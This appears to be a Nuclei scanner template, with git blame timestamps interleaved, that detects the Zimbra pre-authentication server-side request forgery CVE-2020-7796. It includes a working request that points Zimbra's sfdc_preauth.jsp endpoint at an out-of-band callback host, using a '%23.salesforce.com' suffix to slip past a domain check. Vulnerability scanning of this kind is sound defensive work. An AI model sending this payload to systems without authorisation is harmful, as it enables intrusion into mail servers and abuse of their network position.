2021-08-03 07:22:56 +00:00
id : zimbra-preauth-ssrf
info :
2022-06-03 19:12:31 +00:00
name : Zimbra Collaboration Suite - Server-Side Request Forgery
2021-08-03 07:22:56 +00:00
author : gy741
2022-08-27 04:41:18 +00:00
severity : critical
2022-06-03 19:12:31 +00:00
description : Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
2021-08-19 13:59:55 +00:00
reference :
2021-08-03 07:22:56 +00:00
- https://www.adminxe.com/2183.html
2022-06-03 19:12:31 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-7796
2022-08-27 04:41:18 +00:00
- https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7
2022-06-03 19:12:31 +00:00
classification :
2022-08-27 04:41:18 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-06-03 19:12:31 +00:00
cve-id : CVE-2020-7796
cwe-id : CWE-918
2021-10-18 20:40:26 +00:00
tags : zimbra,ssrf,oast
2021-08-03 07:22:56 +00:00
requests :
- raw :
- |
GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
Host : {{Hostname}}
Accept : */*
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-06-03 19:12:31 +00:00
# Enhanced by mp on 2022/06/03